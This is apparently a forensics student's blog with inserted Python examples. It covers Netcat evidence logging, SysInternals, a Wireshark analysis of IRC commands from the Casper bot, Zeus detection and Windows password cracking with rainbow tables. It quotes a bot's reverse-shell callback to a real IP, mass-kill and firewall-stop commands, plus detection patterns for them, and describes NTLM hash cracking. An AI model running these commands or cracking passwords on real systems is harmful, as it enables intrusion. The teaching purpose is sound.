Wednesday, September 16, 2015

Tool: Netcat

Netcat

Description

Netcat is a simple network utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts.

Personal Review

Netcat is a great tool for forensic analysis especially because you can pipe all your commands on the victim computer to your forensic workstation. I find that this helps promote validity of process in case you ever actually end up in the court of law putting bad guys in the slamma-jamma with yo mad forensic powazz. 

Personal Usage Notes

Use Netcat every time you do a forensic analysis. It's best practice and will help you stay organized with your commands and the information those commands return. Use a cheat sheet and practice running the different commands so that you can become a master! Seriously though, if you're into forensics you'll probably be using this tool a lot, and the faster you get it down the more time you will save.
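The workflow above (run a command on the examined box, pipe the output to a listener on the forensic workstation) is what `cmd | nc WORKSTATION PORT` on one side and `nc -l -p PORT > evidence.log` on the other give you. The following is an added Python example, not part of the original post or of Netcat itself, that mirrors that exchange with plain sockets and adds the one thing a raw pipe lacks: a header with the UTC time, host, command line and a SHA-256 of the output, so each captured record can be re-verified later. The collector, the record format and the function names are my own assumptions, not anything Netcat defines.

```python
import hashlib
import socket
import subprocess
import sys
import threading
from datetime import datetime, timezone


def start_collector(host="127.0.0.1", port=0):
    """Minimal stand-in for `nc -l -p PORT > evidence.log` on the workstation:
    accept one connection, keep everything it sends.
    Returns (bound_port, received_list, thread). Port 0 lets the OS pick."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)
    received = []

    def serve():
        conn, _ = srv.accept()
        chunks = []
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
        received.append(b"".join(chunks))
        srv.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return srv.getsockname()[1], received, thread


def make_record(argv, output):
    """Prefix the command output with a header (time, host, command, SHA-256 of
    the output) so the captured bytes can be re-verified later."""
    digest = hashlib.sha256(output).hexdigest()
    header = (f"### {datetime.now(timezone.utc).isoformat()} "
              f"host={socket.gethostname()} cmd={' '.join(argv)} sha256={digest}\n")
    return header.encode() + output


def verify_record(record):
    """Recompute the hash over the body and compare it with the header."""
    header, _, body = record.partition(b"\n")
    claimed = header.rsplit(b"sha256=", 1)[1].decode()
    return hashlib.sha256(body).hexdigest() == claimed


def run_and_forward(argv, host, port):
    """Run the command (argv list, no shell), build the record and ship it to
    the collector over TCP, the way `cmd | nc HOST PORT` would. Returns the record."""
    proc = subprocess.run(argv, capture_output=True)
    record = make_record(argv, proc.stdout + proc.stderr)
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(record)
    return record


if __name__ == "__main__":
    # Demo on localhost; on a real engagement the collector runs on the workstation.
    port, received, thread = start_collector()
    run_and_forward([sys.executable, "-c", "print('hello from the examined host')"],
                    "127.0.0.1", port)
    thread.join(5)
    print(received[0].decode(), "verified:", verify_record(received[0]))
```

Keeping the hash in the header is what lets you show later that the logged output is exactly what the command returned at the time; appending the records to one file per host gives you the organised command history the notes above recommend.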

Source URL


Tool: Windows SysInternals Suite

Windows SysInternals Suite

Description

Windows usually comes with a nice set of administrative tools to help diagnose problems and suspicious activity within the system. However, available for download is an additional admin tool suite that offers so much more. Not to mention, it's free.

SysInternals includes some of the following utilities:
  • Process Explorer - Task Manager on steroids
  • Process Monitor - Monitors network activity from almost any process
  • Autoruns - Specifics on startup processes
  • AND MORE...

Basically any reputable Windows troubleshooter will be using these tools.

Personal Review

SysInternals is great. It's a bunch of free tools to help you go deeper into your Windows forensic analysis than you thought possible. It would be nice if there could be one tool that sort of combines all the features but hey, for free, I really have no reason to be complaining... and I'm not. I have found SysInternals to be EXTREMELY helpful but there are still A LOT of tools in the suite that I haven't used and am still unfamiliar with. I guess that's because you can still accomplish a lot with just the big ones. I hope to become more familiar with the other tools over time.

Personal Usage Notes

When using Windows SysInternals take some time to go to the site and learn about each of the tools. Often there are options inside each tool that can help expand your information depending on your investigation. Watch some tutorial videos so you know and can recognize which tools will help you best in which situations.

Source URL

Analyzing Wireshark Packet Captures

Wireshark Intro

I recommend going to How-To Geek's tutorial for an intro to Wireshark. That way you can learn to capture packets and all the options that go with it. Here we just take a simple packet capture and analyze it.

Computer Evidence Analyzed

Below is an image of the IRC relay we were able to isolate from the packet capture. We were able to determine the situation and the attack occurring based on the conversation between two people in the relay.
lab1_tcp_convo.png

Findings

Upon receiving the sanitized packet capture we opened it with Wireshark to view its details. By following the TCP stream we isolated the IRC chat relay. The first thing we noticed was a conversational rhythm in what appeared to be a different language. By copying and pasting the text into Google Translate we were able to determine that the conversation between the two users was in Romanian. By analyzing the conversation further we noticed there was a third party in the conversation, which we determined to be a bot responding to K3nt!’s commands.

There appeared to be four main technical actions taking place on a Unix system based on the commands given.
  • @conback command
    • By searching “@conback” we were able to determine this specific command was related to the Casper Bot. Further investigation revealed that this command, when followed by an <ip address> and a <port>, creates a reverse shell which gives K3nt! access to the targeted system. The IP address for this command is 74.208.109.177, port 2009. Doing a search on this IP address directs us to a hosting site in Philadelphia. This may or may not be the attacker’s actual location; it may merely be a host.
  • id command
    • The “id” command returned that K3nt! was logged in as root once they gained access to the system. We know K3nt! was root because of what the bot returned: uid=0(root) gid=0(root) groups=48(apache).
  • kill -9 -1 command
    • The “kill -9 -1” command basically slashes the process tree: the -1 target means every process except init (pid 1), and -9 is SIGKILL, so nothing gets a chance to shut down cleanly. This essentially crashes the computer and forces a restart.
  • iptables service stop command
    • iptables is the Linux firewall, and K3nt! is clearly stopping the service and bringing down the firewall.

After taking down the Linux Firewall K3nt! sends a final message: “I am scos ;))” which translates to “I am out” after which, the packet capture ends.
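The manual reading of the IRC stream above is the kind of thing worth scripting once you have done it by hand: pull the PRIVMSG lines out of the reassembled stream, and flag the operator commands and bot replies that mattered here (a callback to an IP and port, an id check, a root uid in the reply, a mass kill, the firewall being stopped). The block below is an added Python example, not part of the original write-up; the sample stream, nick, channel, IP and port in it are constructed and are not the lab capture, and the rule labels are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of a reassembled IRC stream (not the lab's actual capture;
# nick, channel, IP and port are made up). The Romanian line at the end is
# left unmatched on purpose: chat that is not a command should produce nothing.
SAMPLE_STREAM = """\
:K3nt!k@example.invalid PRIVMSG #lab :salut
:cbot!c@victim.invalid PRIVMSG #lab :ready
:K3nt!k@example.invalid PRIVMSG #lab :@conback 192.0.2.10 4444
:K3nt!k@example.invalid PRIVMSG #lab :id
:cbot!c@victim.invalid PRIVMSG #lab :uid=0(root) gid=0(root) groups=48(apache)
:K3nt!k@example.invalid PRIVMSG #lab :kill -9 -1
:K3nt!k@example.invalid PRIVMSG #lab :service iptables stop
:K3nt!k@example.invalid PRIVMSG #lab :am scos ;))
"""

# ":nick!user@host PRIVMSG target :text" -- the one IRC message type that carries chat.
PRIVMSG = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

# (label, pattern over the message text). Named groups end up in Finding.detail.
RULES = [
    ("reverse-shell callback",
     re.compile(r"^@conback\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})$")),
    ("privilege check", re.compile(r"^id$")),
    ("root confirmed", re.compile(r"\buid=0\(root\)")),
    ("mass process kill", re.compile(r"^kill\s+-9\s+-1$")),
    ("firewall stopped", re.compile(r"\biptables\b.*\bstop\b|\bstop\b.*\biptables\b")),
]


@dataclass
class Finding:
    line_no: int
    nick: str
    label: str
    detail: dict = field(default_factory=dict)


def parse_privmsgs(stream):
    """Yield (line number, sender nick, message text) for each PRIVMSG line."""
    for n, line in enumerate(stream.splitlines(), start=1):
        m = PRIVMSG.match(line.strip())
        if m:
            yield n, m.group("nick"), m.group("text")


def triage(stream):
    """Run every rule over every chat line; findings come back in stream order."""
    findings = []
    for n, nick, text in parse_privmsgs(stream):
        for label, rx in RULES:
            m = rx.search(text)
            if m:
                findings.append(Finding(n, nick, label, m.groupdict()))
    return findings


def callback_endpoints(findings):
    """The (ip, port) pairs the bot was told to connect back to: the first
    thing to look up and block."""
    return [(f.detail["ip"], int(f.detail["port"]))
            for f in findings if f.label == "reverse-shell callback"]


if __name__ == "__main__":
    for f in triage(SAMPLE_STREAM):
        print(f"line {f.line_no:2} {f.nick:>5}: {f.label} {f.detail or ''}")
```

Feed it the text from Wireshark's Follow TCP Stream output (saved as ASCII) and the findings list is the timeline the "Findings" section above was built by hand. The rules are deliberately narrow; a new bot family means new patterns, not a change to the parser.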

Conclusions

Through analysis of the packet capture and the isolated IRC relay we were able to conclusively determine that the attacker must have used an exploit of some kind to initially infect the victim system with the Casper Bot. Then the attacker was able to gain access to the system using the Casper Bot’s reverse shell and the @conback command. Once inside the system the attacker used the id command to verify their identity as root, used kill -9 -1 to do a quick restart of the system, and then used iptables to turn off the system firewall. Since this is where the packet capture ends, we can assume turning off the firewall was the main objective.

Zeus Bot


The king of criminalware, a bot designed specifically for stealing very important information (think bank accounts, SSNs, credit cards, etc.). Today we are going to talk about what it is and how to find it, with and without anti-virus programs.


Zeus (Zbot) is a Trojan malware that runs on Windows systems. It is called the king of criminalware because it is mainly used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
Infection usually occurs through drive-by downloads and phishing schemes (think spam emails). Beware social engineering!

Zeus has three parts: a toolkit, the Trojan, and the command & control server. The toolkit creates the threat, the Trojan modifies the infected system, and the C&C server monitors and controls the Trojan.
Zbot was first identified in July 2007 when it stole information from the United States Department of Transportation, and it has become more widespread since then, affecting some pretty renowned companies.

Number of Zbots Over Time (chart)

So when using anti-virus software I recommend Malwarebytes because it has a great track record of finding it.

Without anti-virus software

Run ProcExp and add the Verified Signer column to make sure that all the processes are legitimate. When the video pops up, an unsigned/unverified process will appear alongside it. Use this information to find the location of the Zbot executable. You can also use the command netstat -bano to return which processes are operating on which ports. Since Zbot communicates with the C&C server, you will see it in the output of this command.

  • ProcExp v16.05 - Windows SysInternals Suite
    • Displays information about which handles and DLLs processes have opened or loaded. Use this to view the suspicious process when the Rick Roll video is running and then see which files it has open or loaded.
  • netstat -bano
    • Displays active TCP connections, ports on which the computer is listening, and more.
    • -b: Displays the executable involved in creating each connection (needs an elevated prompt)
    • -a: Displays all active TCP connections and the TCP and UDP ports on which the computer is listening
    • -n: Addresses and ports are expressed numerically
    • -o: Includes the process ID for each connection
    • Run this command to see the Zbot PID running on a connection and then look up that PID in Process Explorer
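The netstat step above is easy to do by eye on a quiet lab box and painful on a busy one, so here is the same triage as an added Python example (not part of the original post, and not a SysInternals tool): parse `netstat -ano` output into rows, keep only ESTABLISHED TCP connections, and group the foreign endpoints that are outside your own address ranges by PID. The sample output is constructed, with documentation-range addresses standing in for a C&C server; the "internal" ranges list is an assumption you would adjust to your network. The output of `-b` adds `[name.exe]` lines under each connection, which the parser skips, so the same function works on either form.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of `netstat -ano` output (not from a real infected host).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    127.0.0.1:49160        127.0.0.1:49161        ESTABLISHED     1204
  TCP    10.0.0.5:49213         198.51.100.23:443      ESTABLISHED     3316
  TCP    10.0.0.5:49220         203.0.113.77:8080      ESTABLISHED     3316
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1020
"""

# Ranges treated as "inside" (assumption: RFC 1918, loopback, link-local, ULA).
# Everything else counts as an external peer worth explaining.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]


def split_endpoint(ep):
    """'1.2.3.4:443' or '[::1]:445' -> (ip_address, port); None for '*:*'."""
    host, _, port = ep.rpartition(":")
    host = host.strip("[]")
    if host in ("*", "") or not port.isdigit():
        return None
    return ipaddress.ip_address(host), int(port)


def parse_netstat(text):
    """Turn the tabular output into dicts; header lines and the '[name.exe]'
    lines produced by -b do not start with TCP/UDP and are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:  # UDP rows have no State column
            proto, local, foreign, pid = parts[:4]
            state = ""
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state, "pid": int(pid)})
    return rows


def is_internal(ip):
    # An IPv4 address is never "in" an IPv6 network, so mixing versions is safe.
    return any(ip in net for net in INTERNAL_NETS)


def external_peers_by_pid(rows):
    """PID -> [(ip, port), ...] for ESTABLISHED TCP connections to non-internal
    addresses. Those PIDs are the ones to look up in Process Explorer."""
    out = defaultdict(list)
    for r in rows:
        if r["state"] != "ESTABLISHED":
            continue
        ep = split_endpoint(r["foreign"])
        if ep and not is_internal(ep[0]):
            out[r["pid"]].append((str(ep[0]), ep[1]))
    return dict(out)


if __name__ == "__main__":
    for pid, peers in external_peers_by_pid(parse_netstat(NETSTAT_SAMPLE)).items():
        print(pid, peers)
```

A browser will of course show up here too; the point is to get from hundreds of lines down to the handful of PIDs that need an explanation, then check each one's image path and signature in Process Explorer.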

Additional Information

McAfee has a pretty detailed analysis report for those who want more in depth information.

Recovering Windows 7 Passwords

Recovering Windows 7 Passwords


So you're a Windows user and have locked yourself out of your computer. I don't know, maybe you changed your password recently and it was something you just couldn't remember but now all your files are on this box and you just can't get in. What do you do?

Use a live CD!

Okay... so what is that?

A live CD is a complete bootable computer installation including operating system which runs in a computer's memory rather than loading from a hard disk drive.

Ophcrack & Rainbow Tables

In this case, I used Ophcrack. Ophcrack is a live CD specifically designed for cracking Windows passwords with rainbow tables. Don't know what a rainbow table is? No worries, I'll explain.

Whenever you create a password, that password is hashed using a hashing algorithm. So if my password was "pass123" it would actually be stored and recognized by the computer as a hashed series of numbers and letters. Rainbow tables are huge (like terabytes) files full of potential passwords and their hashes.

In Ophcrack's case it gets the hash from the locked computer's memory and then goes through all its rainbow tables to find the matching hash!
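To make the "goes through all its rainbow tables" step concrete, here is an added Python example, not code from Ophcrack or from the original post, of the table mechanism itself on a toy password space (three letters from "abc", 27 passwords). It uses md5 as a stand-in hash because it is available everywhere; Windows stores NTLM hashes (MD4 over UTF-16LE) and the mechanics are identical. The thing worth seeing is that a table stores only the start and end of each chain and recomputes the middle on lookup, that a table built from too few chains simply cannot find some passwords (which is why the free basic table fails further down), and that any salt or character outside the table's charset puts a password out of reach entirely.

```python
import hashlib
from itertools import product

# Toy parameters: small enough that the whole space can be checked.
CHARSET = "abc"
PW_LEN = 3
CHAIN_LEN = 5
SPACE = len(CHARSET) ** PW_LEN  # 27 possible passwords


def H(password):
    """Stand-in hash (md5). NTLM would be MD4 over UTF-16LE; the table logic is the same."""
    return hashlib.md5(password.encode()).hexdigest()


def reduce_(digest_hex, step):
    """Map a hash back into the password space. Mixing in the column number
    gives each column its own reduction, which is what makes it a *rainbow*
    table rather than a plain hash chain (far fewer chain merges)."""
    n = (int(digest_hex, 16) + step) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def build_table(starts):
    """Store only (chain end -> chain starts); everything between is recomputed on lookup."""
    table = {}
    for start in starts:
        pw = start
        for step in range(CHAIN_LEN):
            pw = reduce_(H(pw), step)
        table.setdefault(pw, []).append(start)
    return table


def lookup(table, target_hex):
    """For each column the target hash could occupy, rebuild to the chain end;
    if that end is in the table, walk the chain from its start and check each
    candidate's hash (a matching end can be a false alarm, so verify)."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_(target_hex, col)
        for step in range(col + 1, CHAIN_LEN):
            pw = reduce_(H(pw), step)
        for start in table.get(pw, []):
            cand = start
            for step in range(CHAIN_LEN):
                if H(cand) == target_hex:
                    return cand
                cand = reduce_(H(cand), step)
    return None


def all_passwords():
    return ["".join(p) for p in product(CHARSET, repeat=PW_LEN)]


def coverage(table):
    """Fraction of the password space this table can actually recover."""
    pws = all_passwords()
    return sum(lookup(table, H(p)) == p for p in pws) / len(pws)


if __name__ == "__main__":
    full = build_table(all_passwords())          # a chain from every password
    small = build_table(all_passwords()[::9])    # only three chains: the "free basic table"
    print("full table coverage:", coverage(full))
    print("small table coverage:", coverage(small))
    print("lookup of H('cab'):", lookup(full, H("cab")))
    print("salted password:", lookup(full, H("salt" + "cab")))   # None: not in the space
```

The `coverage` numbers are the whole story of L141 below in miniature: when a table's chains do not cover the space, the hash is found on the machine but no chain reaches it, and the tool can only hand you the hash. The salted lookup shows why a per-user salt (which NTLM lacks) defeats precomputed tables outright.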

So when you boot into Ophcrack and run the password cracker it'll look like this:

notfound-ugh.png


Ophcrack comes with a free basic rainbow table and you can buy better complex ones. In this case, the basic rainbow table doesn't quite crack the password but it does give me the password's hash. 

In that case you can go to a hash database site online (make sure it is a hash database for the correct hashing algorithm) and find the clear text that matches the hash. I used NTLM protocol and hashkiller.co.uk in this case.

hashashashash.png

Recovering vs Resetting a Password

So there you have it. Live CDs and rainbow tables. If you need to simply reset your password you can follow tutorials for such a situation online.

However, if you have any encrypted files on your computer, resetting your password will lock you out of all of these! This is because when you reset your password through Control Panel, Windows will automatically update the password for your encrypted files. When you reset your password any other way, it won't update the files, hence you'll be locked out. So be careful! Don't forget, you can always Google!